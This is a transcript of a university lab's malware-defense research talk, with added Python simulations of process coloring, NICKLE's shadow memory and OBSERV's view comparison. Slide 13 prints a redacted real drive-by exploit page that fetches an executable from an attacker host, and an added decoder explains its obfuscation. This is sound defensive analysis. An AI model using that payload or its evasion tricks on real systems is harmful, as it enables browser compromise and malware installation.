Research at FRIENDS Lab (friends.cs.purdue.edu), Dongyan Xu, Associate Professor

Research at FRIENDS Lab, http://friends.cs.purdue.edu. Dongyan Xu, Associate Professor, Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University. Topics: malware defense, honeyfarm (Collapsar), worm playground (vGround).


Presentation Transcript


  1. Research at FRIENDS Lab
     http://friends.cs.purdue.edu
     Dongyan Xu, Associate Professor
     Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University

  2. Research Overview
     Malware Defense
     • Honeyfarm (Collapsar)
     • Playground (vGround)
     • VM introspection (OBSERV)
     • OS information flow (Process Coloring)
     • Kernel rootkit (NICKLE)
     • Reverse engineering (AutoFormat)
     Virtual Infrastructures
     • VIOLIN virtual infrastructure
     • Infrastructure adaptation
     • Infrastructure snapshot
     • Real-world deployment (http://www.nanohub.org)
     Underlying virtualization technology: Xen, QEMU, VirtualBox, KVM, VMware

  3. Project 1: Process Coloring: Information Flow-based Malware Defense
     • Funded by IARPA through AFRL
     • One-sentence summary: propagating and logging provenance information ("colors") along OS-level information flows for malware detection and sensitive data protection
     • Prototype integration with Southwest Research Institute
     • Demo CD completed today!

  4. PC Usage Scenario: Server-Side Malware Defense
     [Diagram: init runs the rc scripts (s30sendmail, s45named, s55sshd, s80httpd) and each service receives its own initial color. The colors diffuse through the syscall log as httpd spawns /bin/sh, wget and netcat and a rootkit is installed; local files and confidential information such as /etc/shadow are the coloring targets.]
     • Capability 1: PC malware alert, e.g. "No shell process should have the color of Apache"
     • Capability 2: Color-based identification of the malware break-in point
     • Capability 3: Color-based log partition for contamination analysis
     Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html

  5. PC Usage Scenario: Client-Side Malware Defense
     [Diagram: client applications, each with its own color: firefox (web browser), turbotax (tax), warcraft (games), notepad (editor). Agobot, fetched from www.malicious.net through the browser, reaches the tax files.]
     • PC malware alert: "Web browser and tax colors should never mix"
     Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi
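The coloring, alerting and log-partitioning logic of slides 3 to 5, as an added simulation in Python. This is not the FRIENDS Lab prototype (which runs in the kernel): the syscall log format, the initial color table, the two policy rules and both logs are constructed for this example.

```python
"""Process Coloring, simulated: provenance "colors" are assigned to services at
start-up and propagated along OS-level information flows (fork, exec, file
read/write) recorded in a syscall log.  Added example; the log format and the
rules below are constructed, not the lab's prototype or demo data."""
import re
from collections import defaultdict

LINE_RE = re.compile(r"^(?P<seq>\d+) (?P<call>\w+) (?P<args>.*)$")


def parse(line):
    """'7 exec pid=401 path=/bin/sh' -> (7, 'exec', {'pid': '401', 'path': '/bin/sh'})"""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    args = dict(kv.split("=", 1) for kv in m["args"].split())
    return int(m["seq"]), m["call"], args


class ColorTracker:
    def __init__(self, initial_colors, rules):
        self.initial_colors = initial_colors  # exec path -> color given at start-up
        self.rules = rules                    # rule name -> predicate(exe_path, colors)
        self.proc_colors = defaultdict(set)   # pid -> colors carried by the process
        self.file_colors = defaultdict(set)   # path -> colors carried by the file
        self.proc_path = {}                   # pid -> executable currently running
        self.partition = defaultdict(list)    # color -> log lines involving that color
        self.alerts = []                      # (seq, rule, pid, exe_path, colors)

    def feed(self, line):
        seq, call, a = parse(line)
        pid = a["pid"]
        subject = pid
        if call == "fork":                    # child inherits the parent's colors
            subject = a["child"]
            self.proc_colors[subject] |= self.proc_colors[pid]
            self.proc_path[subject] = self.proc_path.get(pid)
        elif call == "exec":                  # initial coloring of a service
            self.proc_path[pid] = a["path"]
            if a["path"] in self.initial_colors and not self.proc_colors[pid]:
                self.proc_colors[pid].add(self.initial_colors[a["path"]])
        elif call == "write":                 # process -> file diffusion
            self.file_colors[a["file"]] |= self.proc_colors[pid]
        elif call == "read":                  # file -> process diffusion
            self.proc_colors[pid] |= self.file_colors[a["file"]]
        # Capability 3: every colored entry lands in that color's log partition
        for color in self.proc_colors[subject]:
            self.partition[color].append(line.strip())
        # Capability 1: check the policy rules against the subject's new state
        exe, colors = self.proc_path.get(subject), self.proc_colors[subject]
        for name, rule in self.rules.items():
            if rule(exe, colors):
                self.alerts.append((seq, name, subject, exe, frozenset(colors)))

    def break_in_point(self):
        """Capability 2: the earliest alert marks where the malware got in."""
        return min(self.alerts) if self.alerts else None


def run(log, initial_colors, rules):
    tracker = ColorTracker(initial_colors, rules)
    for line in log.splitlines():
        if line.strip():
            tracker.feed(line)
    return tracker


# Server-side scenario (constructed log): httpd is compromised and spawns a
# shell that downloads and installs a kernel module.
SERVER_INITIAL = {"/usr/sbin/httpd": "httpd", "/usr/sbin/sshd": "sshd"}
SERVER_RULES = {
    # "No shell process should have the color of Apache"
    "shell-with-httpd-color": lambda exe, colors: (
        exe is not None and exe.endswith("/sh") and "httpd" in colors),
}
SERVER_LOG = """\
1 fork pid=1 child=300
2 exec pid=300 path=/usr/sbin/httpd
3 fork pid=1 child=310
4 exec pid=310 path=/usr/sbin/sshd
5 write pid=310 file=/var/log/auth.log
6 fork pid=300 child=401
7 exec pid=401 path=/bin/sh
8 fork pid=401 child=402
9 exec pid=402 path=/usr/bin/wget
10 write pid=402 file=/tmp/rk.tgz
11 fork pid=401 child=403
12 exec pid=403 path=/bin/sh
13 read pid=403 file=/tmp/rk.tgz
14 write pid=403 file=/lib/modules/rk.ko
"""

# Client-side scenario (constructed log): a bot fetched by the browser reads
# the user's tax file, so the "web" and "tax" colors meet in one process.
CLIENT_INITIAL = {"/usr/bin/firefox": "web", "/usr/bin/turbotax": "tax"}
CLIENT_RULES = {
    # "Web browser and tax colors should never mix"
    "web-and-tax-mixed": lambda exe, colors: {"web", "tax"} <= colors,
}
CLIENT_LOG = """\
1 exec pid=500 path=/usr/bin/firefox
2 exec pid=510 path=/usr/bin/turbotax
3 write pid=510 file=/home/alice/tax/2007.tax
4 write pid=500 file=/home/alice/Downloads/agobot.exe
5 fork pid=500 child=520
6 exec pid=520 path=/home/alice/Downloads/agobot.exe
7 read pid=520 file=/home/alice/tax/2007.tax
"""

if __name__ == "__main__":
    for name, log, init, rules in (("server", SERVER_LOG, SERVER_INITIAL, SERVER_RULES),
                                   ("client", CLIENT_LOG, CLIENT_INITIAL, CLIENT_RULES)):
        t = run(log, init, rules)
        print(name, "break-in point:", t.break_in_point())
        for color, lines in t.partition.items():
            print(f"  [{color}] {len(lines)} log entries")
```

In the server log the first alert fires at entry 7, the exec of /bin/sh by a process carrying the httpd color; that entry is the break-in point, and everything the sshd service did stays in the sshd partition, untouched by the httpd contamination. Note that colors only ever accumulate: a process that reads a colored file keeps that color for life, which is what makes the "never mix" rule on the client sound but also what produces noise for benign processes that legitimately touch many colors.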

  6. Project 2: Strategic Defense against Kernel Rootkit Attacks
     • Kernel rootkits: a stealthy and foundational threat to cyberspace
     • Current defense:
       • Symptom-based detection
       • Disruption to the production system
       • Manual forensics
     • Strategic defense:
       • Proactive indication before the attack
       • Automatic avoidance by "steering away" the production system (non-stop operation)
       • Live forensics for future protection

  7. Integrated Defense Scenario
     [Diagram, three stages on the VMM: right before the attack, the production VM (guest OS on VMM) raises an indication; after threat indication, the production VM is forked into a forensics VM and a production VM, the production VM is steered away (avoidance) and cleaned up, and the forensics VM produces a rootkit profile that feeds kernel guarding code. Labels: Production VM, Forensics VM, Guest OS, VMM, Indication, Fork, Avoidance, Forensics, Clean-up, Rootkit Profile, Kernel Guarding Code.]

  8. Results with Real-World Kernel Rootkits [RAID'08 Best Paper Award]
     • Indicating and preventing kernel rootkit attacks at the VMM level

  9. Thank you!
     For more information:
     URL: http://friends.cs.purdue.edu (on a VM)
     Google: "Purdue virtualization friends"
     Email: dxu@cs.purdue.edu

  10. NICKLE: Kernel Rootkit Indicator ("No Instruction Creeping into Kernel Level Executed")
     • Step 1: Create two memory spaces: standard memory and shadow memory
     • Step 2: Authenticate kernel code and copy it to shadow memory
     • Step 3: Memory access dispatch: kernel code fetches go to shadow memory; all other accesses go to standard memory
     [Diagram: guest OS above the VMM; NICKLE inside the VMM keeps a copy of the kernel code in standard memory and in shadow memory.]
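The three steps above as an added Python simulation of the dispatch logic. This is not NICKLE's code (the real system is implemented inside the VMM and intercepts guest memory accesses there); the memory sizes, the SHA-256 trust list and the byte strings standing in for kernel and rootkit code are constructed for the example.

```python
"""NICKLE's shadow-memory dispatch, simulated.  Added example; the real NICKLE
lives inside the VMM, and the byte strings below are constructed stand-ins."""
import hashlib


class NickleVMM:
    def __init__(self, mem_size, trusted_hashes):
        self.standard = bytearray(mem_size)   # step 1: guest-visible memory
        self.shadow = bytearray(mem_size)     # step 1: VMM-private copy of kernel code
        self.trusted = set(trusted_hashes)    # SHA-256 of known-good kernel code
        self.indications = []                 # (addr, bytes) of unauthenticated code fetches

    def guest_write(self, addr, data):
        """Every guest write (kernel or user mode) lands in standard memory only."""
        self.standard[addr:addr + len(data)] = data

    def authenticate_kernel_code(self, addr, length):
        """Step 2: when the guest loads kernel code, hash it and copy it to shadow
        memory only if the hash is on the trusted list.  Returns True if copied."""
        blob = bytes(self.standard[addr:addr + length])
        if hashlib.sha256(blob).hexdigest() not in self.trusted:
            return False
        self.shadow[addr:addr + length] = blob
        return True

    def kernel_fetch(self, addr, length):
        """Step 3a: kernel-mode instruction fetches are served from shadow memory.
        If standard and shadow differ, code reached the kernel without passing
        authentication: record an indication.  The unauthenticated bytes are
        never what gets executed."""
        shadow = bytes(self.shadow[addr:addr + length])
        standard = bytes(self.standard[addr:addr + length])
        if shadow != standard:
            self.indications.append((addr, standard))
        return shadow

    def data_access(self, addr, length):
        """Step 3b: all other accesses go to standard memory."""
        return bytes(self.standard[addr:addr + length])


def demo():
    KERNEL_TEXT = b"\x90\x90\xc3"     # constructed stand-in: nop; nop; ret
    ROOTKIT_TEXT = b"\xcc\xcc\xcc"    # constructed stand-in for injected code
    vmm = NickleVMM(0x100, [hashlib.sha256(KERNEL_TEXT).hexdigest()])

    # Legitimate kernel code: written by the guest, authenticated, shadowed.
    vmm.guest_write(0x10, KERNEL_TEXT)
    legit_ok = vmm.authenticate_kernel_code(0x10, len(KERNEL_TEXT))

    # Rootkit case 1: a module whose code is not on the trusted list.
    vmm.guest_write(0x40, ROOTKIT_TEXT)
    rootkit_ok = vmm.authenticate_kernel_code(0x40, len(ROOTKIT_TEXT))
    fetched_rootkit = vmm.kernel_fetch(0x40, len(ROOTKIT_TEXT))

    # Rootkit case 2: patch existing kernel text in place (e.g. an inline hook).
    vmm.guest_write(0x10, b"\xe9")          # overwrite the first byte with a jmp opcode
    fetched_patched = vmm.kernel_fetch(0x10, len(KERNEL_TEXT))

    return {
        "legit_authenticated": legit_ok,
        "rootkit_authenticated": rootkit_ok,
        "rootkit_fetch": fetched_rootkit,               # zeros: shadow never had it
        "patched_fetch": fetched_patched,               # original bytes, patch ignored
        "rootkit_data_view": vmm.data_access(0x40, 3),  # data reads still see it
        "indications": vmm.indications,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Two things the simulation makes visible: an in-place patch of authenticated kernel text is neutralised as well as a freshly loaded module, because the fetch path never consults standard memory; and data reads still return the rootkit's bytes, so the guest (and the forensics VM of slide 7) can inspect what was injected. Serving zeros from the untouched shadow region is a simplification of this example; the point is that the bytes that execute never come from code that failed authentication.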

  11. Collapsar Honeyfarm [USENIX Security'04]
     [Diagram: redirectors in domains A, B and C forward traffic to the Collapsar center, whose front-end dispatches it to VM-based honeypots; a management station and a correlation engine sit alongside.]
     • Benefit 1: Centralized management of honeypots with distributed presence
     • Benefit 2: Off-site attack occurrence
     • Benefit 3: Convenience for real-time attack correlation and log mining

  12. Collapsar as a Client-side Honeyfarm
     [Diagram: the same redirector / front-end / VM-based honeypot layout as slide 11, with a malicious web server as the contacted party.]
     • Active honeypots with vulnerable client-side software
       • Web browsers (e.g., IE, Firefox, ...)
       • Email clients (e.g., Outlook, ...)
     • PlanetLab (310 sites)
     • [HoneyMonkey, NDSS'06]: 288 malicious sites / 2 zero-day exploits

  13. A Real Incident [JPDC'06]
     • Upon clicking a malicious URL: http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
       <html><head><title></title></head><body>
       <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style>
       <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
       <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>
       <script> try{
       document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58; //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');
       }catch(e){}</script>
       </body></html>
     • Exploited: MS05-002, MS03-011, MS04-013
     • 22 unwanted programs installed without the user's consent!
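What the obfuscated document.write on this slide actually loads, worked through as an added Python example (not part of the presentation). The sample is the slide's string with its redactions (xxx) kept; the whitespace inside the entity run is treated as a transcription artifact and removed, which is an assumption. The mapping of the three delivery mechanisms to the three bulletins listed on the slide comes from the bulletins themselves (MS05-002 covers cursor/icon (.ani/.anr) handling, MS03-011 the Microsoft Java VM, MS04-013 ms-its:/mhtml: URL handling), not from the slide.

```python
"""Decode the obfuscated <object data=...> URL from slide 13.  Added example.
The attacker hides the URL scheme behind numeric HTML entities (without the
closing ';') and splits the JavaScript string literal into '...'+'...' pieces."""
import re

# The argument of document.write as written on the slide (redactions kept,
# whitespace inside the entity run removed: an assumption about transcription).
DOCUMENT_WRITE_ARG = (
    "'<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108"
    "&#58&#102&#105&#108&#101&#58;//C:\\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+"
    "'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'"
)

# The static part of the slide's page (style and applet tags), verbatim.
STATIC_MARKUP = """<style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>"""

JS_CONCAT = re.compile(r"'\s*\+\s*'")     # the '+' seams between literal pieces
NUM_ENTITY = re.compile(r"&#(\d+);?")     # &#109 or &#109; -> chr(109)


def join_js_pieces(arg):
    """Undo the 'a'+'b' splitting: strip the outer quotes, remove the seams.
    JavaScript escapes are left as written (the slide's \\f stays two characters,
    which shows the author's intent rather than what a JS engine would produce)."""
    arg = arg.strip()
    if not (arg.startswith("'") and arg.endswith("'")):
        raise ValueError("expected a single-quoted JS string expression")
    return JS_CONCAT.sub("", arg[1:-1])


def decode_numeric_entities(s):
    """Browsers accept &#NNN with no closing ';', which this obfuscation relies on."""
    return NUM_ENTITY.sub(lambda m: chr(int(m.group(1))), s)


def extract_object_data(html_fragment):
    m = re.search(r"<object\s+data=`([^`]*)`", html_fragment)
    return m.group(1) if m else None


def decode_payload_url(arg=DOCUMENT_WRITE_ARG):
    """Returns (deobfuscated markup, the URL the <object> points at)."""
    html = decode_numeric_entities(join_js_pieces(arg))
    return html, extract_object_data(html)


def classify(page):
    """Match each delivery mechanism in the page to the bulletin that covers it.
    Mapping from the bulletins' own descriptions, not from the slide."""
    findings = []
    if re.search(r"CURSOR:\s*url\(", page, re.I) and ".anr" in page:
        findings.append(("MS05-002", "cursor file (.anr) loaded via CSS cursor"))
    if re.search(r"<APPLET\b", page, re.I):
        findings.append(("MS03-011", "Java applet for the Microsoft VM"))
    if "ms-its:mhtml:" in page:
        findings.append(("MS04-013", "ms-its:mhtml: CHM/MHTML URL in <object>"))
    return findings


if __name__ == "__main__":
    html, url = decode_payload_url()
    print("object data URL:", url)
    for bulletin, how in classify(STATIC_MARKUP + html):
        print(f"{bulletin}: {how}")
```

The decoded object points at `ms-its:mhtml:file://C:\foo.mht!http://vxxxxxxe.biz//adverts//033//targ.chm::/target.htm`: a local MHTML path that does not exist, with a remote CHM appended after the `!`, the pattern that made the browser fetch and run attacker-controlled content in the Local zone. Entity decoding without the terminating semicolon and the string-splitting are both there to get past signature matching on the literal scheme name, so any static detector for this family has to normalise both before matching.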

  14. vGround: A Virtual Worm Playground (demo) [RAID'05]
     A worm playground, as called for in "Fighting Computer Virus Attacks", Peter Szor, USENIX Security Symposium, 2004
     • High fidelity: VM, full-system virtualization
     • Strict confinement: VN, link-layer network virtualization
     • Easy deployment: locally deployable
     • Efficient experiments: image generation time 60 seconds, boot-strap time 90 seconds, tear-down time 10 seconds
     [Diagram: playground hosted on dallas.cs.purdue.edu]

  15. OBSERV: "Out-of-the-Box" Malware Detection
     State-of-the-art malware defense: running anti-malware software inside the monitored system
     • Advantage: it can see everything (e.g., files, processes, ...)
     • Disadvantage: it may not see anything!
     [Diagram: IE, Firefox, VirusScan, ... all running on the OS kernel inside the same box.]

  16. Why "Out-of-the-Box"?
     • The current approach is fundamentally flawed: the anti-malware software and the software it protects run at the same privilege level, so there is no root of trust
     • Solution: going "out-of-the-box"
     [Diagram: VirusScan moved out of the guest (IE, Firefox, ... on the OS kernel) down to the Virtual Machine Monitor (VMM), marked with a question mark.]

  17. The "Semantic-Gap" Challenge
     • What we can observe:
       • Low-level states: memory pages, disk blocks, ...
       • Low-level events: privileged instructions, interrupts, I/O, ...
     • What we want to observe:
       • High-level semantic states: files, processes, ...
       • High-level semantic events: system calls, context switches, ...
     [Diagram: VirusScan at the Virtual Machine Monitor (e.g., VMware, Xen), separated from the guest OS by the semantic gap.]

  18. Our Solution: OBSERV
     OBSERV: "Out-of-the-Box" with SEmantically Reconstructed View
     • A new mechanism missing in existing VMMs [ACM CCS'07]
     [Diagram: OBSERV sits in the Virtual Machine Monitor (VMM) beneath the guest (IE, Firefox, ... on the OS kernel).]

  19. New Capabilities Enabled by OBSERV
     [Diagram: the inside-the-box view and the OBSERV view of the same guest (IE, Firefox, ... on the OS kernel over the VMM) are diffed.]
     • Capability I: Invisible system logging
     • Capability II: Malware detection by view comparison
     • Capability III: External run of COTS anti-malware software
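Semantic reconstruction (slides 17 and 18) and view comparison (Capability II above), as an added Python simulation. This is not OBSERV's code: the guest memory image, the task record layout (which is not the real Linux task_struct), the address of the list head and the in-guest `ps` output are all constructed for the example. The technique is the one the slides describe: rebuild the guest's process list from raw memory using knowledge of the guest kernel's data structures, then diff it against what tools inside the guest report.

```python
"""Out-of-the-box view reconstruction and view comparison, simulated.  Added
example with a constructed guest memory image; not OBSERV's implementation."""
import struct

# Constructed layout of one task record in guest memory (not real Linux offsets):
#   u32 pid | 16-byte NUL-padded comm | u64 guest address of the next task record
TASK_FMT = "<I16sQ"
TASK_SIZE = 32                 # records are allocated 32 bytes apart
INIT_TASK_ADDR = 0x1000        # where the list head (pid 0, the idle task) lives


def build_guest_memory(tasks, base=INIT_TASK_ADDR, size=0x2000):
    """Lay the tasks out as a circular singly-linked list, as a guest kernel would."""
    mem = bytearray(size)
    for i, (pid, comm) in enumerate(tasks):
        nxt = base + ((i + 1) % len(tasks)) * TASK_SIZE
        struct.pack_into(TASK_FMT, mem, base + i * TASK_SIZE,
                         pid, comm.encode().ljust(16, b"\0"), nxt)
    return bytes(mem)


def reconstruct_process_list(mem, head=INIT_TASK_ADDR, max_tasks=4096):
    """Low-level view -> high-level view: walk the task list in raw memory.
    Stops when the list wraps around; refuses runaway walks from corrupt pointers,
    which is what a rootkit that unlinks or garbles records would otherwise cause."""
    procs, addr, seen = [], head, set()
    while addr not in seen:
        if len(seen) >= max_tasks or addr + TASK_SIZE > len(mem):
            raise ValueError(f"task list walk went astray at {addr:#x}")
        seen.add(addr)
        pid, comm, nxt = struct.unpack_from(TASK_FMT, mem, addr)
        procs.append((pid, comm.split(b"\0", 1)[0].decode()))
        addr = nxt
    return procs


def parse_ps(text):
    """Inside-the-box view: parse (constructed) `ps` output into (pid, comm)."""
    rows = [ln.split(None, 1) for ln in text.strip().splitlines()[1:]]
    return [(int(pid), comm) for pid, comm in rows]


def compare_views(inside, observ, ignore_pids=(0,)):
    """Capability II: processes present in guest memory but absent from the
    guest's own view.  pid 0 is the idle task, which `ps` never lists."""
    return sorted(p for p in set(observ) - set(inside) if p[0] not in ignore_pids)


# Constructed guest state: a bot is running, and a rootkit filters it out of /proc,
# so `ps` inside the guest does not show it while the task list still holds it.
GUEST_TASKS = [(0, "swapper"), (1, "init"), (212, "sshd"), (1337, "agobot"), (980, "firefox")]
INSIDE_PS = """\
  PID CMD
    1 init
  212 sshd
  980 firefox
"""


def demo():
    mem = build_guest_memory(GUEST_TASKS)
    observ_view = reconstruct_process_list(mem)
    inside_view = parse_ps(INSIDE_PS)
    return observ_view, inside_view, compare_views(inside_view, observ_view)


if __name__ == "__main__":
    observ_view, inside_view, hidden = demo()
    print("OBSERV view: ", observ_view)
    print("inside view: ", inside_view)
    print("hidden:      ", hidden)
```

The reconstruction only works because the walker knows the exact record layout and the list head address for this particular guest kernel; in practice those come from the kernel's symbol table and per-version structure definitions, and a guest kernel upgrade that changes an offset silently breaks the view. The comparison also cuts the other way: a rootkit that removes its task from the kernel list (DKOM) hides from this walker too, which is why a view built from one data structure is usually cross-checked against another (run queues, open handles, the scheduler's view).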

  20. AutoFormat: Malware Protocol Reverse Engineering [NDSS'08]
     • Given a malware binary, infer its protocol format

  21. Inferring Slapper Worm (Botnet) Protocol
     [Figure: the inferred message format is aligned with the worm's nested data structure declaration; matching fields are numbered 1, 2 and 3, and a compiler-inserted gap (alignment padding) is identified.]

  22. VIOLIN: Portable, Adaptive Virtual Environments [TR'03, IEEE Computer'05]
     • Adaptive virtual environments on a shared hosting infrastructure
     [Diagram: virtual environments, including DB nodes, spread across the Internet.]

  23. Adaptation Architecture and Sample Scenario (Demo) [IEEE ICAC'06]
     [Diagram: VMs on each VMM are connected by VIOLIN switches over the physical network; a monitoring daemon per host reports CPU updates to the adaptation manager, which triggers scale-up and migrate actions.]

  24. Live VIOLIN Snapshot (Demo) [ACM/IEEE VTDC'07]
     • Useful for application- and OS-transparent recovery from
       • Crashes, failures, and disasters
       • Unexpected power/network outages
     • And for VIOLIN replay
     [Diagram: a snapshot taken at one hosting center is resumed at another.]
